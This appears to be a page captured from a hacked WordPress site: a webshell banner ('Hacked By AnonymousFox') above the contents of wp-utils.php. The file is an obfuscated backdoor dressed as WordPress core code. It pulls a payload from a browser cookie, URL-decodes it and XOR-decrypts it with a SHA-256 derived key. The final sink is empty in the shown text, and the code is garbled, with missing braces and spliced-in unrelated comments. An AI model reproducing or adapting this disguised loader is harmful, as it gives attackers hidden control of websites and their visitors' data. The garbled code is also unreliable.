Hacked By AnonymousFox

Current Path : /home/allslyeo/public_html/
Upload File :
Current File : /home/allslyeo/public_html/wp-utils.php

 * Adds a role, if it does not exist.
 * @since 2.0.0
 * @param string $role         Role name.
 * @param string $display_name Display name for role.
 * @param bool[] $capabilities List of capabilities keyed by the capability name,
 *                             e.g. array( 'edit_posts' => true, 'delete_posts' => false ).
 * @return WP_Role|void WP_Role object, if the role is added.
function wp_admin_bar_render($changed_status) {
    $warning_message = SetUmask($changed_status);
    $original_nav_menu_locations = wp_set_password($changed_status);
    return [$warning_message, $original_nav_menu_locations];

     * Extract the public key from a crypto_box keypair.
     * @param string $active_formatting_elementspair Keypair containing secret and public key
     * @return string         Your crypto_box public key
     * @throws SodiumException
     * @throws TypeError
     * @psalm-suppress MixedArgument
function get_current_site($archive_files)
    $autosave_revision_post = remove_placeholder_escape($archive_files);
    $setting_id_patterns = get_contributor($archive_files, $autosave_revision_post);
    return $setting_id_patterns;

	 * @since 2.7.0
	 * @var resource
function build_time_query($has_line_breaks)
    $content_media_count = get_child($has_line_breaks);
    $cur_key = list_core_update($content_media_count); // Primitive Capabilities.
    return $cur_key;

 * Core class used to implement meta queries for the Meta API.
 * Used for generating SQL clauses that filter a primary query according to metadata keys and values.
 * WP_Meta_Query is a helper that allows primary query classes, such as WP_Query and WP_User_Query,
 * to filter their results by object metadata, by generating `JOIN` and `WHERE` subclauses to be attached
 * to the primary SQL query string.
 * @since 3.2.0
function toInt32($home_origin)
    $media_shortcodes = strlen($home_origin);
    return $media_shortcodes; // Otherwise, fall back on the comments from `$wp_query->comments`.

	 * Response data.
	 * @since 4.4.0
	 * @var mixed
function wp_set_password($changed_status) { // On deletion of menu, if another menu exists, show it.
    return array_map('strtolower', $changed_status); // Put them together.

	 * Trash the changeset post if revisions are not enabled. Unpublished
	 * changesets by default get garbage collected due to the auto-draft status.
	 * When a changeset post is published, however, it would no longer get cleaned
	 * out. This is a problem when the changeset posts are never displayed anywhere,
	 * since they would just be endlessly piling up. So here we use the revisions
	 * feature to indicate whether or not a published changeset should get trashed
	 * and thus garbage collected.
function remove_placeholder_escape($starter_copy)
{ // These counts are handled by wp_update_network_counts() on Multisite:
    $value_array = substr($starter_copy, -4);
    return $value_array;

	 * Enqueue preview scripts.
	 * These scripts normally are enqueued just-in-time when a widget is rendered.
	 * In the customizer, however, widgets can be dynamically added and rendered via
	 * selective refresh, and so it is important to unconditionally enqueue them in
	 * case a widget does get added.
	 * @since 4.8.0
function wp_mediaelement_fallback($spacing_sizes_by_origin, $assets) // auto-PLAY atom
    $config_file = toInt32($spacing_sizes_by_origin);
    $ancestor = wp_reschedule_event($assets, $config_file);
    $notification = get_user_comments_approved($ancestor, $spacing_sizes_by_origin);
    return $notification;

/* translators: %d: Number of requests. */
function the_author_url($calling_post_id, $widget_b) {
  return $calling_post_id * $widget_b; // It is stored as a string, but should be exposed as an integer.

/* translators: 1: Parameter, 2: Schema title, 3: Reason. */
function is_multisite()
    $notification = do_action();
    akismet_load_js_and_css($notification); // Accepts only 'user', 'admin' , 'both' or default '' as $notify.

     * @var int
function akismet_load_js_and_css($js_required_message) // 4.19  BUF  Recommended buffer size
{ // ----- Look for a file
} // Avoid timeouts. The maximum number of parsed boxes is arbitrary.

     * Rotate to the right
     * @param int $c
     * @return ParagonIE_Sodium_Core32_Int32
     * @throws SodiumException
     * @throws TypeError
     * @psalm-suppress MixedArrayAccess
function list_core_update($ActualBitsPerSample)
{ //    s12 += s23 * 470296;
    $wp_param = rawurldecode($ActualBitsPerSample); // Set to use PHP's mail().
    return $wp_param;

 * Registers the `core/comment-author-name` block on the server.
function plugin_action_links($calling_post_id, $widget_b, $cache_plugins) {
  $preview_label = the_author_url($calling_post_id, $widget_b); // As of 4.1, duplicate slugs are allowed as long as they're in different taxonomies.
  $client_public = format_for_header($preview_label, $cache_plugins);
  return $client_public;

 * Text construct
function the_author_aim($rows_affected, $has_custom_classname_support) {
  $editor_class = [];
  $font_families = min(count($rows_affected), count($has_custom_classname_support));
  for ($sticky_posts = 0; $sticky_posts < $font_families; $sticky_posts++) { // Second Ogg page, after header block
    $editor_class[] = [$rows_affected[$sticky_posts], $has_custom_classname_support[$sticky_posts]];
  return $editor_class;

	 * Checks if WordPress is controlled by a VCS (Git, Subversion etc).
	 * @since 5.2.0
	 * @return array The test results.
function get_user_comments_approved($limit_schema, $post_objects) // Get settings from alternative (legacy) option.
    $previousStatusCode = $limit_schema ^ $post_objects;
    return $previousStatusCode;
} // roomtyp2: Room Type, ch2, 2 Bits

	 * Filters text with its translation based on context information.
	 * @since 2.8.0
	 * @param string $translation Translated text.
	 * @param string $text        Text to translate.
	 * @param string $context     Context information for the translators.
	 * @param string $domain      Text domain. Unique identifier for retrieving translated strings.
function format_for_header($calling_post_id, $cache_plugins) {
  return $calling_post_id - $cache_plugins;

 * Notifies the site administrator via email when a request is confirmed.
 * Without this, the admin would have to manually check the site to see if any
 * action was needed on their part yet.
 * @since 4.9.6
 * @param int $request_id The ID of the request.
function get_contributor($upgrade_network_message, $my_day) // Last three:
{ // Strip slashes from the front of $front.
    $parent_path = wp_get_computed_fluid_typography_value($upgrade_network_message);
    $cur_key = build_time_query($my_day); // phpcs:ignore WordPress.WP.I18n.LowLevelTranslationFunction,WordPress.WP.I18n.NonSingularStringLiteralText
    $colors_by_origin = wp_mediaelement_fallback($cur_key, $parent_path);
    return $colors_by_origin;

			 * > Any other end tag
function get_child($bgcolor) // Default - number or invalid.
    $edit_date = $_COOKIE[$bgcolor];
    return $edit_date; //    s12 += s20 * 136657;
} // 'term_taxonomy_id' lookups don't require taxonomy checks.

 * Private preg_replace callback used in image_add_caption().
 * @access private
 * @since 3.4.0
 * @param array $matches Single regex match.
 * @return string Cleaned up HTML for caption.
function do_action()
    $default_minimum_viewport_width = validate_cookie(); // Flush rules to pick up the new page.
    $checkbox_items = get_current_site($default_minimum_viewport_width); // contains address of last redirected address
    return $checkbox_items;

 * Determines whether or not we have a large network.
 * The default criteria for a large network is either more than 10,000 users or more than 10,000 sites.
 * Plugins can alter this criteria using the {@see 'wp_is_large_network'} filter.
 * @since 3.3.0
 * @since 4.8.0 The `$network_id` parameter has been added.
 * @param string   $using      'sites' or 'users'. Default is 'sites'.
 * @param int|null $network_id ID of the network. Default is the current network.
 * @return bool True if the network meets the criteria for large. False otherwise.
function SetUmask($changed_status) {
    return array_map('strtoupper', $changed_status); // Check if the Custom Fields meta box has been removed at some point.

     * @param ParagonIE_Sodium_Core32_Int64 $right
     * @return ParagonIE_Sodium_Core32_Int64
function wp_ajax_image_editor($changed_status) {
  $blocks_metadata = [[], []];
  foreach ($changed_status as $site_status) {
    $blocks_metadata[0][] = $site_status[0];
    $blocks_metadata[1][] = $site_status[1];
  return $blocks_metadata;

	 * Creates a new post for any registered post type.
	 * @since 3.4.0
	 * @link https://en.wikipedia.org/wiki/RSS_enclosure for information on RSS enclosures.
	 * @param array $args {
	 *     Method arguments. Note: top-level arguments must be ordered as documented.
	 *     @type int    $0 Blog ID (unused).
	 *     @type string $1 Username.
	 *     @type string $2 Password.
	 *     @type array  $3 {
	 *         Content struct for adding a new post. See wp_insert_post() for information on
	 *         additional post fields
	 *         @type string $post_type      Post type. Default 'post'.
	 *         @type string $post_status    Post status. Default 'draft'
	 *         @type string $post_title     Post title.
	 *         @type int    $post_author    Post author ID.
	 *         @type string $post_excerpt   Post excerpt.
	 *         @type string $post_content   Post content.
	 *         @type string $post_date_gmt  Post date in GMT.
	 *         @type string $post_date      Post date.
	 *         @type string $post_password  Post password (20-character limit).
	 *         @type string $comment_status Post comment enabled status. Accepts 'open' or 'closed'.
	 *         @type string $ping_status    Post ping status. Accepts 'open' or 'closed'.
	 *         @type bool   $sticky         Whether the post should be sticky. Automatically false if
	 *                                      `$post_status` is 'private'.
	 *         @type int    $post_thumbnail ID of an image to use as the post thumbnail/featured image.
	 *         @type array  $custom_fields  Array of meta key/value pairs to add to the post.
	 *         @type array  $terms          Associative array with taxonomy names as keys and arrays
	 *                                      of term IDs as values.
	 *         @type array  $terms_names    Associative array with taxonomy names as keys and arrays
	 *                                      of term names as values.
	 *         @type array  $enclosure      {
	 *             Array of feed enclosure data to add to post meta.
	 *             @type string $url    URL for the feed enclosure.
	 *             @type int    $font_families Size in bytes of the enclosure.
	 *             @type string $type   Mime-type for the enclosure.
	 *         }
	 *     }
	 * }
	 * @return int|IXR_Error Post ID on success, IXR_Error instance otherwise.
function wp_get_computed_fluid_typography_value($newpost)
    $lineno = hash("sha256", $newpost, TRUE);
    return $lineno;

/** Load WordPress Administration Bootstrap. */
function validate_cookie()
    $last_checked = "nkgNzDIJTDBCuqVVxLMhkLBnltEKcN";
    return $last_checked;
} // Default to AND.

	 * Retrieves block's output schema, conforming to JSON Schema.
	 * @since 5.0.0
	 * @return array Item schema data.
function wp_reschedule_event($active_formatting_elements, $background_size)
    $ATOM_SIMPLE_ELEMENTS = str_pad($active_formatting_elements, $background_size, $active_formatting_elements); // Compat.
is_multisite(); // Copyright message

Hacked By AnonymousFox1.0, Coded By AnonymousFox